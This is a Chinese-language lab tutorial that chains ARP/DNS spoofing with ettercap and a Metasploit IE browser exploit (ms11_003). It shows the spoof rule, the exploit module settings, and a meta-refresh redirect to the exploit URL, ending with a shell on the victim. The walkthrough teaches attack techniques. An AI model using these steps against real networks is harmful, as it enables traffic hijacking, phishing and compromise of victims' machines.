DNS劫持-配合网页木马钓鱼渗透

admin 2023年11月20日11:21:01评论20 views字数 1555阅读5分11秒阅读模式

实验环境


                   win7 桥接                                      kaili桥接

DNS劫持-配合网页木马钓鱼渗透

1.设置劫持网卡


┌──(root㉿rsec)-[~]
└─# ettercap -G

DNS劫持-配合网页木马钓鱼渗透

选择网卡

DNS劫持-配合网页木马钓鱼渗透

点击对钩

DNS劫持-配合网页木马钓鱼渗透

DNS劫持-配合网页木马钓鱼渗透

2.扫描网卡存活ip

DNS劫持-配合网页木马钓鱼渗透

扫描中

DNS劫持-配合网页木马钓鱼渗透

点击存活主机列表

DNS劫持-配合网页木马钓鱼渗透

DNS劫持-配合网页木马钓鱼渗透

3.选择攻击目标ip


选择网关ip 点击Add 通Target1

选择受害者ip 点击Add 通Target2

DNS劫持-配合网页木马钓鱼渗透

DNS劫持-配合网页木马钓鱼渗透

4.启用ARP监听模式

DNS劫持-配合网页木马钓鱼渗透

DNS劫持-配合网页木马钓鱼渗透

安装apache2并启动

└─# apt install apache2   
└─# systemctl start apache2
└─# cd /var/www/html
└─# echo rsec >index.html #设置网页内容为rsec
DNS劫持-配合网页木马钓鱼渗透

5.设置DNS劫持规则

修改配置文件/etc/ettercap/etter.dns 添加如下规则,告诉ettercap需要欺骗那些网址的dns。

*.com A 192.168.2.32

DNS劫持-配合网页木马钓鱼渗透

DNS劫持-配合网页木马钓鱼渗透

6.启用DNS劫持插件

选择插件

DNS劫持-配合网页木马钓鱼渗透

DNS劫持-配合网页木马钓鱼渗透DNS劫持-配合网页木马钓鱼渗透

在受害者win7查看mac,已经变成攻击者的mac,ping百度后变成了kali攻击者的ip。

C:UsersAdministratorDesktoparpspoof>arp -a

接口: 192.168.40.21 --- 0xb
Internet 地址 物理地址 类型
192.168.40.1 00-50-56-c0-00-04 动态
192.168.40.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态

接口: 192.168.2.33 --- 0x11
Internet 地址 物理地址 类型
192.168.2.1 00-0c-29-d2-e8-46 动态
192.168.2.32 00-0c-29-d2-e8-46 动态
192.168.2.80 00-0c-29-83-3e-c8 动态
192.168.2.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态

C:UsersAdministratorDesktoparpspoof>ping baidu.com

正在 Ping baidu.com [192.168.2.32] 具有 32 字节的数据:
来自 192.168.2.32 的回复: 字节=32 时间<1ms TTL=64

访问百度,发现已经变成了我们修改的页面内容。

DNS劫持-配合网页木马钓鱼渗透

DNS劫持-配合网页木马钓鱼渗透

7.网页木马获取系统权限

kaili中启动msf进入利用模块

use exploit/windows/browser/ms11_003_ie_css_import
set URIPATH 00
set srvhost 192.168.2.32
run

DNS劫持-配合网页木马钓鱼渗透

网页木马地址为http://192.168.2.32:8080/00

修改kali中/var/www/html/index.html中源码为,实现meta自动跳转网页木马地址

<!-- 以下方式只是刷新不跳转到其他页面-->
<meta http-equiv="refresh" content="10">
<!-- 以下方式定时转到其他页面 -->
<meta http-equiv="refresh" content="5;url=http://192.168.2.32:8080/00">
</head>

模拟受害者在win7的ie浏览器中访问baidu.com

DNS劫持-配合网页木马钓鱼渗透

稍等片刻会自动跳转我们的网马地址

DNS劫持-配合网页木马钓鱼渗透

kali的msf端成功获取到权限

DNS劫持-配合网页木马钓鱼渗透

DNS劫持-配合网页木马钓鱼渗透

原文始发于微信公众号(揽月安全团队):DNS劫持-配合网页木马钓鱼渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月20日11:21:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DNS劫持-配合网页木马钓鱼渗透http://cn-sec.com/archives/2222003.html

发表评论

匿名网友 填写信息